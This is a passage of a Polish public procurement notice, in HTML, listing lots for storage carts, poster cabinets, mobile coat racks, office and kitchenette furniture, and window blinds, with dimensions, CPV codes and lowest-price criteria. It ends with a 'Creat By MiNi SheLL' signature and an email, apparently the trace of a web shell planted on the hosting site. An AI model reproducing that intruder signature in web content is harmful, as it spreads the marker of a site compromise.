Wymiary całkowite wózków (wysokość x szerokość x głębokość w cm) wg. poniższego zestawienia
dopasowane do regałów zestawionych powyżej (parkują pod półką w poszczególnych segmentach):
a) dziesięć wózków o wymiarach 100 x 55 x 80 (do regałów a),
b) trzy wózki o wymiarach 100 x 75 x 120 (do regału d),
c) dwa wózki o wymiarach 100 x 60 x 100 do sztalug (zabudowa wózka otwarta od strony dłuższego boku dla umożliwienia załadunku i rozładunku). 
Gwarancja min. 2 lata, od daty odbioru dostawy.

B. Wózki magazynowe, ażurowo zabudowane, wykonane z profili.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 36.15.10.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 14.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Meble magazynowe - szafy plakatowe z montażem.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> A. Szafa plakatowa B1 - 3 szt.

Szafa metalowa wykonana z blachy nie cieńszej niż 0,6 mm, malowanej proszkowo (popiel) lub w kolorze RAL 7039 Quarzgrau, wyposażona w 70 mm cokół, pozwalający na swobodę pracy przy niej i dziesięć szuflad przystosowanych do przechowywania plakatów, grafik itp. o maksymalnym formacie B-1 (wymiar użytkowy szuflady 105-110 x 75-78 cm). Szuflady z blachy o grubości nie cieńszej niż 1 mm, przetłoczone lub wzmocnione przeciw odkształceniom - ugięciom pod ciężarem zbiorów, wysuwane po prowadnicach z łożyskami kulkowymi, z blokadą zabezpieczającą przed wypadnięciem oraz pozwalające na tzw. pełny wysuw szuflad, wyposażone w uchwyt wnękowy na całej szerokości szuflady (uchwyt nie wystający poza obrys szafy).
Całość o wymiarach nie przekraczających (wysokość x szerokość x głębokość): 80 x 120 x 85 cm
zamykana centralnym zamkiem
Gwarancja min. 2 lata, od daty odbioru dostawy. Do oferty należy dołączyć fotografię proponowanego produktu. Produkt dostarczany z usługą montażu.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.15.10.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 14.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Meble magazynowe - wieszaki szatniowe mobilne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> A. Wieszaki szatniowe mobilne - 5 szt.

Wieszaki w postaci prostokątnej ramy opartej u dołu na dwóch poprzecznych wspornikach wyposażonych w kółka, całość o wymiarach (wysokość x szerokość x głębokość): 170 x 200 x 50 cm,   wykonane z profilu stalowego lub aluminiowego o przekroju kwadratowym lub okrągłym, z górnym relingiem o przekroju okrągłym oraz prostokątnym uchwytem (50 x 10 cm) na wysokości ok. 100 cm od dolnej krawędzi jednego z pionowych ramion ramy wieszaka (uchwyt transportowy - wieszak do parasoli), malowane proszkowo w kolorze RAL 7039 Quarzgrau lub szarym.
Każdy z zestawem 30 szt. plastikowych wieszaków ubraniowych. 
Gwarancja min. 2 lata, od daty odbioru dostawy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.15.10.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 14.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Meble biurowe z montażem.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> A. Biurka pracownicze - 3 szt.
B. Regały dokumentowe zamknięte - 4 szt.
C. Regały dokumentowe otwarte - 2 szt.
D. Witryna komisowa - 1 komplet.
E. Szafy ubraniowe - 2 szt.
F. Meble zaplecza socjalnego - 1 komplet.

Meble biurowe wykonane z płyty melaminowej o grubościach od 24 do 45 mm, okleinowanej wraz z krawędziami wzorem Dąb Windsor (Krono) i antracyt lub malowanej w kolorze RAL 7039 Quarzgrau, z wysokiej klasy osprzętem (np. firmy Blum) i domykającymi się zawiasami, frontami i szufladami; o wymiarach wg. poniższego zestawienia:
a) trzy biurka pracownicze o wymiarach blatu 160 x 70, grubości 36 mm (Dąb Windsor) wspartym, na stałe, z jednej strony na pełnym boku, o szerokości blatu, grubości 24 mm i do wysokości biurka 73 cm, w kolorze RAL 7039 Quarzgrau, a z drugiej na pełnym kontenerku biurowym o szerokości 45 i głębokości 60 cm, w kolorze jak wyżej, z wysuwanymi 3 szufladami (dolna wyższa i dwie niższe; na prowadnicach z łożyskami kulkowymi z blokadą zabezpieczającą przed wypadnięciem oraz pozwalającymi na tzw. pełny wysuw szuflad), zamykanymi centralnym zamkiem, których front w kolorze Dąb Windsor, z możliwością montażu z prawej lub lewej strony biurka; wyposażone w otwory na przewody lub zamykane zestawy gniazd oraz trzy wózki na kółkach (20 x 50 x 40 cm) do stacji komputerowych.
b) trzy regały dokumentowe, o wymiarach (wysokość x szerokość x głębokość w cm) 120 x 120 x 40 i jeden o wymiarach 73 x 120 x 40, z płyty o grubości 24 w kolorze RAL 7039 Quarzgrau, stojące na regulowanych nogach maskowanych cokołem o wysokości 70 mm; podzielone wewnątrz na 2 pionowe segmenty (pionowa ścianka 24mm, Dąb Windsor) po 2 półki (także 24 mm, Dąb Windsor); zamykane przesuwnymi 2 frontami w kolorze Dąb Windsor i zamykane zamkiem centralnym.
c) dwa regały dokumentowe otwarte, o wymiarach (wysokość x szerokość x głębokość w cm): jeden -  210 x 250 x 40, drugi - 120 x 200 x 40, z płyty o grubości 24 w kolorze RAL 7039 Quarzgrau, stojące na regulowanych nogach maskowanych cokołem o wysokości 70 mm; podzielone wewnątrz na  pionowe 50 cm segmenty (pionowe ścianki 24mm, Dąb Windsor) po 5 półek w pierwszym regale i po 3 w drugim (także 24 mm, Dąb Windsor); z możliwością montażu na dowolnej wysokości.
d) witryna komisowa składająca się z trzech regałów otwartych, o wymiarach (wysokość x szerokość x głębokość w cm): 300 x 60 x 40 (dwa) i 300 x 70 x 70 (jeden), z płyty o grubości 24 w kolorze RAL 7039 Quarzgrau, stojące na regulowanych nogach maskowanych cokołem o wysokości 70 mm;
z 7 półkami każda (24 mm, Dąb Windsor), z możliwością ich montażu na dowolnej wysokości.
Ponadto dwa skrzydła otwierane na zawiasach na prawo i lewo o wymiarach (wysokość x szerokość w cm): 210 x 100, wykonane z płyty melaminowej o grubościach 18 mm i zdystansowanej na niej z zewnętrznej strony płyty perforowanej 5 mm otworami (do zawieszania na haczykach obrazów, ram i antyram) w kolorze RAL 7039 Quarzgrau.
e) dwie szafy ubraniowe o wymiarach (wysokość x szerokość x głębokość w cm) 210 x 60 x 50, z płyty o grubości 24 w kolorze RAL 7039 Quarzgrau, stojące na regulowanych nogach maskowanych cokołem o wysokości 70 mm; z jedną półką każda i zamykane frontem 24mm, Dąb Windsor.
f) meble zaplecza socjalnego wykonane z płyty melaminowej o grubościach od 18 mm i blatem o grubości 45 mm, w kolorze RAL 7039 Quarzgrau z frontami okleinowanymi wraz z krawędziami wzorem Dąb Windsor, o szerokości łącznej 420 cm, głębokości 60 cm i wysokości 73, stojące na regulowanych nogach maskowanych cokołem o wysokości 70 mm; podzielone na segmenty o szerokościach: 120 + 80 + 110 (narożna) + 60 + 60 (w tym szafka narożna z kontenerem wewnętrznym, szafka pod zlewozmywak dwukomorowy i szafka z 3 szufladami i dwie szafki, każda z 1 półką wewnętrzną) oraz szafki wiszące, zamykane podnoszonymi równolegle do góry frontami (Dąb Windsor), o łącznej szerokości 420 cm wysokości 50 cm i głębokości 30 cm, z jedną półką każda, podzielone na segmenty 100 + 100 + 110 (narożna, otwarta) + 60.

Gwarancja min. 2 lata, od daty odbioru dostawy.
Produkt dostarczany z usługą montażu..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.13.00.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 14.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Żaluzje i rolety okienne wewnętrzne z montażem.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> A. Żaluzje pionowe - 5 szt.
B. Rolety - 9 szt.

A. Żaluzje wewnętrzne, pionowe, z montowaną do stropu białą, aluminiową szyną, ze składanymi i obracanymi lamelami 127 mm, wykonanymi z tkaniny w kolorze kremowym, o wymiarach wg. poniższego zestawienia (szerokość x wysokość w cm):
1 szt. 200 x 210 pakiet z lewej strony, mechanizm z prawej
2 szt. 90 x 300 pakiet z prawej strony, mechanizm z prawej
1 szt. 365 x 300 pakiet z prawej i lewej strony, mechanizm z prawej
1 szt. 430 x 300 pakiet z prawej i lewej strony, mechanizm z lewej

B. Rolety wewnętrzne, montowane do stropu lub ściany - ramy okiennej (w drzwiach w kasecie), wykonane z identycznej tkaniny jak żaluzje powyżej, o wymiarach wg. poniższego zestawienia (szerokość x wysokość w cm):
3 szt. 90 x 200 (drzwi) - mechanizm z prawej,
3 szt. 110 x 280 (drzwi) - mechanizm z prawej (1x) i lewej (2x),
1 szt. 110 x 80 (drzwi) - mechanizm z prawej,
2 szt. 150 x 280 (drzwi) - mechanizm z prawej,

Gwarancja min. 2 lata, od daty odbioru dostawy.
Produkt dostarczany z usługą montażu..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.51.54.40-1, 39.51.54.10-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 14.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com